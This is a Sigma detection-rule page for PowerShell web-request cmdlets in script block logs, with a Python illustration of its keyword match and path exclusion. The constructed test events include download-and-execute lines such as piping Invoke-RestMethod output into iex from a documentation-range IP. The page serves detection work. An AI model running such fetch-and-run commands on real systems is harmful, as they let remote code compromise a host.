Usage Of Web Request Commands And Cmdlets - ScriptBlock

Sigma Rules

Summary
This rule detects the execution of web request commands and cmdlets in PowerShell script blocks, specifically Invoke-RestMethod, Invoke-WebRequest and their shorthand or alias forms such as curl and wget. It relies on PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log), which records the content of executed script blocks; if that logging is not enabled, the rule has nothing to match on. These commands are routinely used by attackers to download malicious payloads or to exfiltrate data, so their appearance in script block logs warrants review. The alert fires when a script block contains one of the listed command patterns, except when the script path begins with 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\', which covers the Azure Guest Configuration agent's routine activity and is excluded to reduce false positives. Further tuning should be expected: administrators and deployment tooling also use these cmdlets legitimately, so a match should be triaged in context (requested URL, output path, parent process, user) rather than treated as compromise on its own.
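The rule's matching logic, as an added example and not the rule's own definition or any code from the Sigma project: a small Python stand-in that applies the keyword match and the path exclusion described above to constructed 4104-style events. The field names ScriptBlockText and Path follow the Event ID 4104 schema; the keyword list, which extends the page's cmdlets with their PowerShell aliases (iwr, irm, curl, wget), and the sample events are assumptions made for illustration, not the rule's actual keyword list.

```python
import re

# Keywords modelled on the rule's description: the two cmdlets plus their
# PowerShell aliases. ASSUMPTION: the real rule's keyword list may differ.
# Boundaries are added so that e.g. "curly" does not match "curl".
WEB_REQUEST_PATTERN = re.compile(
    r"(?<![\w-])(?:Invoke-RestMethod|Invoke-WebRequest|iwr|irm|curl|wget)(?![\w-])",
    re.IGNORECASE,
)

# Script path prefix the rule excludes (Azure Guest Configuration agent).
EXCLUDED_PATH_PREFIX = (
    r"C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows" + "\\"
)


def is_excluded(path: str) -> bool:
    """True when the script path falls under the excluded prefix (case-insensitive, as on NTFS)."""
    return path.lower().startswith(EXCLUDED_PATH_PREFIX.lower())


def matches_rule(event: dict) -> bool:
    """Apply the rule to one 4104-style event: keyword present and path not excluded."""
    text = event.get("ScriptBlockText", "")
    if not WEB_REQUEST_PATTERN.search(text):
        return False
    return not is_excluded(event.get("Path", ""))


def evaluate(events):
    """Return the ids of the events that would raise this alert."""
    return [e["id"] for e in events if matches_rule(e)]


# Constructed sample events (not real telemetry); 198.51.100.0/24 is a
# documentation range and example.invalid is a reserved name.
SAMPLE_EVENTS = [
    {"id": "e1", "Path": "",
     "ScriptBlockText": r"Invoke-WebRequest -Uri http://198.51.100.7/payload.ps1 -OutFile $env:TEMP\p.ps1"},
    {"id": "e2", "Path": "",
     "ScriptBlockText": "irm http://198.51.100.7/x | iex"},
    {"id": "e3",
     "Path": r"C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\1.0\Helper.ps1",
     "ScriptBlockText": "$r = Invoke-RestMethod -Uri https://example.invalid/api"},
    {"id": "e4", "Path": "",
     "ScriptBlockText": r"Get-ChildItem C:\curly\ | Format-Table"},
    {"id": "e5", "Path": "",
     "ScriptBlockText": "wget -Uri https://example.invalid/tool.exe -OutFile tool.exe"},
]

if __name__ == "__main__":
    for event_id in evaluate(SAMPLE_EVENTS):
        print("ALERT:", event_id)
```

Two practical caveats when porting this to a real pipeline: Sigma's `contains` is a plain substring test, so the word boundaries above are a tightening choice rather than the rule's behaviour, and PowerShell splits large script blocks across several 4104 events (MessageNumber/MessageTotal), so a keyword can straddle two records and be missed unless the fragments are reassembled first.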
Categories
  • Endpoint
  • Windows
Data Sources
  • Script
  • Application Log
Created: 2019-10-24